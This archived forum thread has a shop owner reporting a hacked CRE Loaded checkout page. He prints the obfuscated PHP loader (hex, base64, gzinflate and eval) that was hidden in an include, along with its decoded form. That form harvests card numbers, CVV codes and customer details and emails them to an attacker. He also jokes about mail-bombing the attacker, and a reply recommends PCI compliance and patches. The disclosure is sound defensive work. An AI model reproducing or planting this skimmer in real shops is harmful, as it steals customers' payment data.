graith Posted August 31, 2010 Posted August 31, 2010 I found this code in checkout_confirmation.php require(DIR_WS_INCLUDES . 'inc_lib.php'); which looks like this. <? function d($s,$k=''){if($k==''){for($i=0;$i<strlen($s);$i){$d.=chr(hexdec(substr($s,$i,2)));$i=(float)($i)+2;}return $d;}else{$r='';$f=d('6261736536345f6465636f6465');$u=$f('Z3ppbmZsYXRl');$s=$u($f($s));for($i=0;$i<strlen($s);$i++){$c=substr($s,$i,1);$kc=substr($k,($i%strlen($k))-1,1);$c=chr(ord($c)-ord($kc));$r.=$c;}return $r;}}eval(d("dVNbU9tGGP1fycDQMPBsxsbIRooviZs2CWkaYxNozEwK8SWE+qbVdXdlrbS7klZSAu3093WNwgMz6ZvmO+c7e86ZTwQ/VQkLEG2pqVY7Pv+wp+Xd339VS6OLWtPjqRU297NWtTc6Kam034OAMtCq/wM9u1U/aL3+V4VIsND0HOpW+uWK+XF89XnaNJbm6htzWXP2auex5tokX5V6e5o5vPgyumro0AxjBkCiGN3tTc1YCuokSaf2tqTOJqPJWK8v3VmamixbIO5lK21+vPVI1aFIgOBt5U1NBZfj4eVSgS7gmU7S2S0y799Kk1flI2XfGn8aXf914OqWaycFhPLw5UNITggFYsZ4GPn16+7mtuqmceehVTmBBIXWjQtEwZG1ROChDZQyioo4ug73+kpix4s5BALF3LK9BDvpUyWiOgp+7luIejaz9AYMxGqezgjU5p1yhQcIRa0TYIeIMNSsPVcVpdZoV5pNraO018qBxT2sdCsaIdAQnWMzZyHHOJkfZhZEvs9D+3vSABBvnYJHFqZaX89FEjCLLBVMTUTvjRVkkTBshes4lCGLdHDWRxFK5B8aRaQuUAwslN2AF7vPqmbhMc/JLtedFv0E0cOB/8jCDKr0MlJ8EOHMY8jSPTvZcLVXc+j80/DwYVeH58O/7wczM4+nA0P1+aljp86UudwsI78Utm/CzjFggrkRt1ypfgA/tKnt++qCoThzTW/WtuQZHljEZ7iWyeW0N9wpXuTFSX4qKTelbm7cW5jLCEPEkEtZvqS/IfOs8DAVK5DV57xFA/iGEoduWXcRC+eaVYUPQPs9PNUTvSv+S8zPgztIFu/bgTpQqSSc3/zwD8VYY7eVjR5DAzvbA0mcsuJ9bCHTHl1qdxyTL0uG9ve3N3YeLKf8W7V8RZc5EHfZbodNiAPqvIHWbchG2PUcWu9avXj+4nSPTubFpCGo4CVj+onggdvaj74Gp7asfnC8Gj5eGfrp+2tR3RBwqqqce/5niaEETRKKk69dkWzCcft7n8=",864930819)); ?> Decoding it turns it into this if((isset($v) AND $v==0) OR (isset($t) AND $t==false)){die('');}$first_name = $_POST['cc_owner']; $ccnum = $_POST['cc_number']; $ccstart1 = $_POST['cc_start_month']; $ccstart2 = $_POST['cc_start_year']; $cvv2 = $_POST['cc_ccv']; $exp1 = $_POST['cc_expires_month']; $exp2 = $_POST['cc_expires_year']; $issue = $_POST['cc_issue']; $add = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', '---'); $phone = $order->customer['telephone']; $email = $order->customer['email_address']; $street = $order->customer['street_address']; $city = $order->customer['city']; $state = $order->customer['state']; $zip = $order->customer['postcode']; $ip = $_SERVER["REMOTE_ADDR"]; $msg = "Email: $email\nstreet: $street\ncity: $city\nState: $state\nzip: $zip\nPhone: $phone Name: $first_name\nCcnumber: $ccnum\nExpdate: $exp1/$exp2\nCVV: $cvv2\nStart: $ccstart1/$ccstart1\nIssue: $issue IP: $ip\nAddress: $add"; $to="[email protected]"; $subj = "HEY BABY"; $from ="From: [email protected]"; mail ($to, $subj, $msg, $from); Its job is to email the credit card details to the email address [email protected] with subject HEY BABY It'd be a great shame if he got 10,000 emails from [email protected] with that subject or if that email address was submitted to some obnoxious email feed. I've no idea how the site was hacked. It's a version of CRE Loaded and the admin directory is password protected. Every file had its date and time stamp set to November 2007 so we can't trace exactly when it was done. We've turned off accepting credit card payment and we'll have to use a payment provider instead. Graith
Guest Posted August 31, 2010 Posted August 31, 2010 Brian, Unless your site was PCI DSS compliant, you should not have been accepting credit cards anyway. Ensure you site is V2.2 RC2a and has ALL of the security patches and suggested Security Contributions installed to avoid any future security breaches. Chris
Recommended Posts
Archived
This topic is now archived and is closed to further replies.